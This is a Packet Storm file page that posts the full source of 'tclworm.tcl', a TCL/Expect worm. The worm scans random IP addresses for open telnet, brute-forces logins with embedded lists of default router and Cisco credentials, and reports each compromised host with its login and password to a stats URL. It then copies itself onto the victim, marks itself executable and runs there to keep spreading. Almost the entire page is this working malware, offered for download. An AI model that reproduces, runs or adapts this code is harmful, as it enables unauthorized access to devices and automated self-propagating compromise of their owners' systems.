exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tclworm.tcl

tclworm.tcl
Posted Dec 16, 2003
Authored by sirius_black | Site membres.lycos.fr

Tclworm.tcl is a worm coded in TCL/Expect which exploits easily guessed passwords.

tags | worm
SHA-256 | 0c9228c982c7b924b7ccb6422167e490a8ec9d7bbd96d8253170385626c0bcf4

tclworm.tcl

Change Mirror Download
#!/usr/bin/expect
# TCLWORM v1.0
# by sirius_black
# http://membres.lycos.fr/lotfree

if {[fork]!=0} exit
disconnect

set wget_found 0
set telnet_found 0
set wget_path ""
set telnet_path ""

set liste_telnet {
"" ""
admin 1234
admin admin
admin "default"
administrator ""
Administrator ""
admin ""
admin "switch"
admin synnet
adm ""
bbsd-client changeme2
bbsd-client NULL
cablecom router
chochete tiabuena
debug d.e.b.u.g
debug synnet
diag "switch"
D-Link D-Link
dream trocse
echo echo
guest guest
login admin
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
manager friend
manager manager
Manager Manager
Manager ""
monitor monitor
#n/a 1234
#n/a 14admin
#n/a admin
#n/a adtran
#n/a ascend
#n/a BRIDGE
#n/a cisco
#n/a NetICs
#n/a ""
#n/a orinoco
#n/a password
#n/a PASSWORD
#n/a secret
#n/a secure
#n/a "Serial Number"
#n/a speedxess
#n/a telos
#netopia netopia
"" 1234
"" access
"" netadmin
"" ""
"" root
operator admin
operator ""
read synnet
root administrator
root "default"
!root ""
root ""
root par0t
root pass
root QNX
root root
root tini
security security
service smile
setup ""
sysadm anicust
sysadm sysadm
tech ""
tech tech
Telnet ""
test test
User ""
write "private"
write synnet
}

set liste_cisco {
"" ""
admin admin
admin "default"
Administrator changeme
bbsd-client changeme2
bbsd-client NULL
cisco cisco
enable cisco
#n/a ""
#n/a admin
#n/a c
#n/a cc
#n/a cisco
#n/a "Cisco routeur"
#n/a letmein
netrangr attack
ripeop ""
root attack
}

proc get_random_ip {} {
set tcl_precision 3
set ip ""
append ip [expr round((rand()*1000)/4)]
for {set i 0} {$i < 3} {incr i 1} {
append ip "."
append ip [expr round((rand()*1000)/4)]
}
return $ip
}

proc is_telnet_open ip {
set is_open 0
if { [catch {set sock [socket $ip 23]} ] } {
set is_open 0
} else {
set is_open 1
close $sock
}
return $is_open
}

proc where_are_progs {} {
global wget_found
global telnet_found
global wget_path
global telnet_path
if [file exists "/usr/bin/wget"]==1 {
set wget_found 1
set wget_path "/usr/bin/wget"
}
if [file exists "/usr/bin/telnet"]==1 {
set telnet_found 1
set telnet_path "/usr/bin/telnet"
}
}

proc whereis_worm {} {
set worm_path [pwd]
set file_name [lindex [split [info script] "/"] end]
append worm_path "/" $file_name
return $worm_path
}

proc get_content {} {
set f [open [whereis_worm] "r"]
set texte ""
while { ![eof $f] } {
set ligne [gets $f]
set ligne [string map {\\ \\\\ \$ \\\$ \` \\\`} $ligne]
set ligne [string trim $ligne]
append texte "$ligne\n"
}
close $f
return $texte
}

proc MyIpaddr {} {
set addr ""
if {[catch {dns address [info hostname]} addr]} {
set server [socket -server # 0]
set port [lindex [fconfigure $server -sockname] 2]
set host [lindex [fconfigure $server -sockname] 1]
set client [socket $host $port]
set addr [lindex [fconfigure $client -sockname] 0]
close $client
close $server
}
return $addr
}

proc MyNet {} {
set net ""
regexp {(.*)\..*} [MyIpaddr] {} net
return $net
}

proc declare_becane {ip login password} {
set lheaders "Connection close"
if {![llength [info commands "::http::geturl"]]} {
if {[catch {package require http}]} {
return "zut"
}
}
::http::config -useragent "TCLWORM v1.0 (LOTFREE)"
set htmlUrl "http://localhost:3128/wormstat.php?ip=$ip&login=$login&pass=$password"
if { [catch { ::http::geturl $htmlUrl} token]} {
return "zut"
}
if { [::http::status $token] != "ok"} {
return "zut"
}
set htmlFile [::http::data $token]
if { [regexp "haxored" $htmlFile] == 1 } {
return "next"
}
return "go"
}

where_are_progs

set ip ""
while {1==1} {
set ip [get_random_ip]
if { [regexp "^127" $ip] == 1 } {
continue
}
if { ![is_telnet_open $ip] } {
continue
} else {
if {$telnet_found == 1} {
#on utilise telnet
foreach {login passwd} $liste_telnet {
spawn -noecho $telnet_path $ip 23
expect {
"ogin:" { send "$login\n" }
"user:" { send "$login\n" }
"imeout" { continue }
"ailure" { continue }
"nknow host" { continue }
"o route to host" { continue }
"o adresse associated with name" { continue }
}
expect {
"incorrect" { continue }
"ssword:" { send "$passwd\n" }
}
expect {
"ast login:" {
if { [declare_becane $ip $login $passwd] == "next" } {
send "logout\nexit\n"
continue
} else {
exec sleep 2
send "cat > tclworm << EOF\n"
expect ">"
send [get_content]
expect ">"
send "EOF\n"
expect "$"
send "chmod +x tclworm\n"
expect "$"
send "./tclworm\n"
expect "$"
send "logout\nexit\n"
#continue
}
}
}
}
}
# fin de on utilise telnet
continue
}
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close